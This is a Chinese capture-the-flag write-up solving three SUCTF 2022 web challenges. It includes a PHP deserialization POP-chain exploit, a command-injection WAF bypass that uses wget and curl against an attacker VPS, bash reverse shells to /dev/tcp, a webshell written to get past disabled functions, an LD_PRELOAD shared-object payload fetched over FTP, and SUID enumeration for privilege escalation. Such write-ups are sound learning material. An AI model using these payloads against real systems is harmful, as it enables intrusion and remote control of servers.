就简单的做了做web

Web

ezpop

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
<?php

class crow
{
public $v1;
public $v2;

function eval() {
echo new $this->v1($this->v2);
}

public function __invoke()
{
$this->v1->world();
}
}

class fin
{
public $f1;

public function __destruct()
{
echo $this->f1 . '114514';
}

public function run()
{
($this->f1)();
}

public function __call($a, $b)
{
echo $this->f1->get_flag();
}

}

class what
{
public $a;

public function __toString()
{
$this->a->run();
return 'hello';
}
}
class mix
{
public $m1;

public function run()
{
($this->m1)();
}

public function get_flag()
{
eval('#' . $this->m1);
}

}

if (isset($_POST['cmd'])) {
unserialize($_POST['cmd']);
} else {
highlight_file(__FILE__);
}

简单的pop,exp如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<?php
class mix
{
public $m1;
}

class fin
{
public $f1;
}

class crow
{
public $v1;
}


class what
{
public $a;
}

$mix = new mix;
$mix->m1 = "\r\nphpinfo();";

$fin = new fin;
$fin->f1 = $mix;

$crow = new crow;
$crow->v1 = $fin;

$mix2 = new mix;
$mix2->m1 = $crow;

$what = new what;
$what->a = $mix2;

$fin2 = new fin;
$fin2->f1 = $what;

echo urlencode(serialize($fin2));

calc

有源码app.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#coding=utf-8
from flask import Flask,render_template,url_for,render_template_string,redirect,request,current_app,session,abort,send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time


app=Flask(__name__)

def waf(s):
blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']
flag = True
for no in blacklist:
if no.lower() in s.lower():
flag= False
print(no)
break
return flag


@app.route("/")
def index():
"欢迎来到SUctf2022"
return render_template("index.html")

@app.route("/calc",methods=['GET'])
def calc():
ip = request.remote_addr
num = request.values.get("num")
print(num)
log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)
print(log)
if waf(num):
try:
data = eval(num)
os.system(log)
except Exception as e:
data = ''
print(str(e))

return str(data)
else:
return "waf!!"





if __name__ == "__main__":
app.run(host='0.0.0.0',port=5000,debug=True)




绕过

1
/calc?num=7*7%23`curl%092guj3l.dnslog.cn`

image-20220326164618254

先去vps上放个shell.sh

1
bash -i >& /dev/tcp/xxxxx/xxxx 0>&1

用wget下载shell.sh到/tmp

1
/calc?num=7*7%23`wget%09-P%09/tmp%09http://vps/shell.sh`

运行,获得反弹shell

1
2
/calc?num=7*7%23`chmod%09777%09/tmp/shell.sh` 
/calc?num=7*7%23`/tmp/shell.sh`

upgdstore

可以直接传php,但是从phpinfo可以看到,禁用了绝大部分函数

image-20220326165952773

用字符串拼接或常量、动态函数的方式,使用file_get_contents可以读取源码

1
<?php echo ('fil'.'e_get_contents')('/var/www/html/index.php');
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
HTTP/1.1 200 OK
Server: openresty
Date: Sat, 26 Mar 2022 09:01:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1695
Connection: close
Vary: Accept-Encoding

<div class="light"><span class="glow">
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
嘿伙计,传个火?!
<input class="input_file" type="file" name="upload_file"/>
<input class="button" type="submit" name="submit" value="upload"/>
</form>
</span><span class="flare"></span><div>
<?php
function fun($var): bool{
$blacklist = ["\$_", "eval","copy" ,"assert","usort","include", "require", "$", "^", "~", "-", "%", "*","file","fopen","fwriter","fput","copy","curl","fread","fget","function_exists","dl","putenv","system","exec","shell_exec","passthru","proc_open","proc_close", "proc_get_status","checkdnsrr","getmxrr","getservbyname","getservbyport", "syslog","popen","show_source","highlight_file","`","chmod"];

foreach($blacklist as $blackword){
if(strstr($var, $blackword)) return True;
}


return False;
}
error_reporting(0);
//设置上传目录
define("UPLOAD_PATH", "./uploads");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_name = $_FILES['upload_file']['name'];
$ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!preg_match("/php/i", strtolower($ext))){
die("只要好看的php");
}

$content = file_get_contents($temp_file);
if(fun($content)){
die("诶,被我发现了吧");
}
$new_file_name = md5($file_name).".".$ext;
$img_path = UPLOAD_PATH . '/' . $new_file_name;


if (move_uploaded_file($temp_file, $img_path)){
$is_upload = true;
} else {
$msg = 'Upload Failed!';
die();
}
echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}

由于过滤了$,我们无法使用变量,过滤了-我们无法调用类的动态方法

由于绝大部分写文件函数都被禁止了,我们考虑使用内置类SplFileObject::fwrite进行写文件,写一句话木马

利用继承,重写一个类,把动态方法调用变成静态方法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
define("EV", "eva"."l");
define("GETCONT", "fil"."e_get_contents");
// 由于禁止了$,我们只能从已有的地方获取$符
define("D",(GETCONT)('/var/www/html/index.php')[353]);
define("SHELL","<?php ".EV."(".D."_POST['a']);");
echo (GETCONT)('./shell.php');

class splf extends SplFileObject {

public function __destruct() {
parent::fwrite(SHELL);
}
}

define("PHARA", new splf('shell.php','w'));

这样我们就可以获得一句话木马了

image-20220326170613992

但是disable_function过滤了许多函数,还是无法进行getflag

考虑使用preload之类的方法进行bypass,直接利用文件上传不可行,因为二进制的so文件总是会出现$之类的符号,导致被过滤

先编译so文件

gcc -shared -fPIC hook_getuid.c -o hook_getuid.so

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void payload() {
system("bash -c 'bash -i >& /dev/tcp/47.xxx.xxx.72/2333 0>&1'");
}

uid_t getuid() {
if (getenv("LD_PRELOAD") == NULL) {
return 0;
}
unsetenv("LD_PRELOAD");
payload();
}


从phpinfo可以看到,ftp相关函数没有被禁用,于是在自己服务器搭建一个ftp服务器,进行文件上传

python简易ftp服务器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer


authorizer = DummyAuthorizer()

authorizer.add_anonymous("./")

handler = FTPHandler
handler.authorizer = authorizer

handler.masquerade_address = "xxx"
# 注意要用被动模式
handler.passive_ports = range(2333,2335 )

server = FTPServer(("0.0.0.0", 21), handler)
server.serve_forever()

php利用ftp进行文件下载

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$local_file = '/tmp/hack1.so';
$server_file = 'hack.so';
$ftp_server = 'xxxxx';
$ftp_port=21;

$ftp = ftp_connect($ftp_server,$ftp_port);


$login_result = ftp_login($ftp, 'anonymous', '');
// 注意要开启被动模式
ftp_pasv($ftp,1);

if (ftp_get($ftp, $local_file, $server_file, FTP_BINARY)) {
echo "Successfully written to $local_file\n";
} else {
echo "There was a problem\n";
}

ftp_close($ftp);

image-20220326170952571

反弹shell

1
2
putenv("LD_PRELOAD=/tmp/hack1.so");
mail("a@localhost","","","","");

发现获取flag需要提权

image-20220326171156361

suid提权

1
2
3
find /bin -perm -u=s -type f 2>/dev/null
find /usr -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

image-20220326171718126